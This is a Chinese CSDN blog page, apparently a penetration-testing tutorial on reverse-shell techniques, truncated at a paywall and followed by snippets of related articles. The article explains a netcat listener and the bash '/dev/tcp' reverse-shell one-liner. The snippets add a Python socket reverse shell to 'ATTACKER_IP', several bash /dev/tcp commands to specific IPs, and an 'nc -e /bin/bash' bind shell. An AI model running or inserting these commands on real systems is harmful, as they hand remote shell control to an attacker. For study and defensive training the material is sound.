web渗透常见shell反弹姿势

最新推荐文章于 2024-04-21 12:44:28 发布
最新推荐文章于 2024-04-21 12:44:28 发布
阅读量783 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: shell bash 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RuoLi_s/article/details/110286504
版权

常见反弹shell总结:

原文链接请点击:https://www.cnblogs.com/ruoli-s/p/14204882.html

一、bash反弹

通用

① 在kali机里面开启端口监听:

nc -lvvp port		//port 为攻击主机端口号,并且此端口号没有被占用

② 在目标主机上执行:

bash -i >& /dev/tcp/攻击主机ip/port 0>&1		//port 为攻击主机端口号

③ 解释

bash -i: 打开一个交互的bash

.>&: 标准错误输出重定向到标准输出

/dev/tcp/x.x.x.x/port : 意为调用socket,建立socket连接,其中x.x.x.x为要反弹到的主机ip,port为端口

0>&1: 标准输入重定向到标准输出,实现你与反弹出来的shell的交互

/dev/tcp/ 是Linux中的一个特殊设备,打开这个文件就相当于发出了一个socket调用,建立一个socket连接,读写这个文件就相当于在这个socket连接中传输数据。同理,Linux中还存在/dev/udp/。

④ 补充

linux she

最低0.47元/天 解锁文章
RuoLi_s
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
webshell反弹工具包
01-25
成套web反弹工具包,包含控制端,被控端。和端口监听工具,配套详细的使用说明
反弹shell
litiammmm的博客
07-29 840
感谢:https://zhuanlan.zhihu.com/p/138393396 https://www.cnblogs.com/iouwenbo/p/11277453.html 什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端(普通人)发起请求到该端口,并将其命令行的输入输出转到控制端(黑客)。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹s.
反弹shell 看这一篇就够了
m0_69043895的博客
04-21 1466
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是与应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
[网鼎杯 2020 朱雀组]phpweb-反弹shell
YkingH的博客
03-10 5430
[网鼎杯 2020 朱雀组]phpweb 通过反弹shell获取flag 打开链接,显示一个不断刷新的页面,通过burp抓包查看 通过对页面源代码的分析,发现在本页面中,通过post传入index.php中两个参数,通过对参数的修改,发现用到了call_user_func()函数 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sXIyF4mu-1646878901483)(D:\Blog\做题题解[网鼎杯 2020 朱雀组]phpweb\image-2022030920444
【web安全】反弹shell 靶场测试+实战
weixin_46301214的博客
11-22 477
NAT不一定可以,而且多了一行话,相同用户名的情况下还以为失败了。这里只讲实战或真机演练,具体原理网上一搜一大把,自己去看。知识点2:靶机测试 - 双kali - 脚本反弹。知识点2:靶机测试 - 双kali - 脚本反弹。知识点1:靶机测试 - 双kali。踩坑点:局域网内才稳定。:需要局域网内才稳定。
webshel反弹shell
公众号shadow sock7
10-21 662
只需要使用burp的decoder功能,将命令url编码一下就可以了。 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s....
内网渗透-反弹shell.pdf
10-28
这是一份学习笔记,各个文章的摘抄整合。比较全面的反弹shell方法
反弹shell的各种姿势.pdf
最新发布
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常实用) [ 隧道技术 ] 反弹shell(一)nc反弹shell [ 隧道技术 ] 反弹shell(二)bash反弹shell [ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python...
Web控制台:基于Web的简单shell,浏览器中的远程shell
02-05
Web控制台是一个基于Web的应用程序,它允许直接从浏览器(基于Web的外壳程序)在服务器上执行Shell命令。 该应用程序非常轻巧,不需要任何数据库,可以在大约3分钟内安装和配置。 如果您喜欢Web Console,请考虑有...
反弹shell小工具源码
10-12
依赖PHP环境。修改IP端口,自动生成命令
ctf web中快速反弹
wssmiss的博客
03-25 567
**原文:**https://ciphersaw.me/2017/12/16/详解 CTF Web 中的快速反弹 POST 请求/ 原文作者:Cipher Saw 0x00 前言 在 CTF Web 的基础题中,经常出现一类题型:在 HTTP 响应头获取了一段有效期很短的 key 值后,需要将经过处理后的 key 值快速 POST 给服务器,若 key 值还在有效期内,则服务器返回最终的 flag...
[陇剑杯 2021]简单日志分析
J_linnb的博客
04-30 309
将最后一串base64编码解码发现ip端口,由于最后一串中含有url编码,可以先进行url解码再进行base64解码。黑客查看的秘密文件的绝对路径是(/Th4s_IS_VERY_Import_Fi1e)。黑客反弹shellip端口是(192.168.2.197:8888)将user后面base64编码解码后发现黑客查看的文件路径。黑客攻击的参数是(user)。(如有字母请全部使用小写)分析日志,可以发现黑客使用user传参所有参数为user。
反弹shell总结
weixin_44576725的博客
04-26 4524
反弹shell 在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反弹shell简单来说就是通过命令让靶机的shell的控制权交到攻击者的机器中。 可能有人会问:我们都能够在靶机
渗透中反弹shell端口
千寻的博客
01-03 1812
渗透中反弹shell端口 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shellbash完成,所以某些情况下不支持 python版本: `python-c'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_S...
网络安全-反弹shell详解(攻击,检测与防御)
关注网络安全、云原生安全
09-21 5786
简介 如果我们需要到服务器上执行 Shell 命令,但是因为防火墙等原因,无法由客户端主动发起连接的情况,就可以使用反弹 Shell 来满足登陆和操作的需求。 原理 反弹shell bash php python nc telnet perl 参考 ​​​​​​基于主机的反弹shell检测思路 - 哔哩哔哩 常用的反弹shell总结_西部壮仔的博客-CSDN博客_反弹shell能干嘛 ...
反弹shell学习(一):基础反弹姿势
E1even的博客
07-25 1913
文章目录bash反弹:nc反弹:-e被阉割的情况:nc -e:利用Telnet反弹shell方法1:方法2:python脚本反弹:PHP反弹shell总结: bash反弹: 这是最常见也是最简单的一种反弹shell的方式,直接看命令: 攻击机:nc -lvp 2333 受害机:bash -i >& /dev/tcp/192.168.28.133/2333 0>&1 攻击机: 受害机: 最后攻击机达成的效果: 可以命令执行,再实际中不可能获取的是root权限,所以成功反弹s
反弹shell方法
Cwillchris的博客
05-04 604
假如ubuntu、CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu、CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell。 需要目标机安装nc。 反向反弹shell 方法1:bash反弹
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 2910
详细讲解Linux反弹shell包含的NC正向shell,NC反向shellbash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
linux内网渗透反弹shell
08-03
在Linux内网渗透中,反弹shell是一种常见的技术手段。其中,Bash反弹shell是最简单且最常见的一种方式。首先,在攻击机上使用nc命令监听一个端口。然后,在目标机器上使用Python脚本去反向连接攻击机的IP端口。这样,攻击机的终端就可以获得目标机器的shell。除了Bash反弹shell,还可以使用Kali的MSF框架生成木马来反弹shell。此外,在内网渗透中,还经常涉及端口转发和正向代理的概念。这些技术手段可以帮助渗透测试人员在内网环境中获取更多的权限和信息。[1][2][3]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值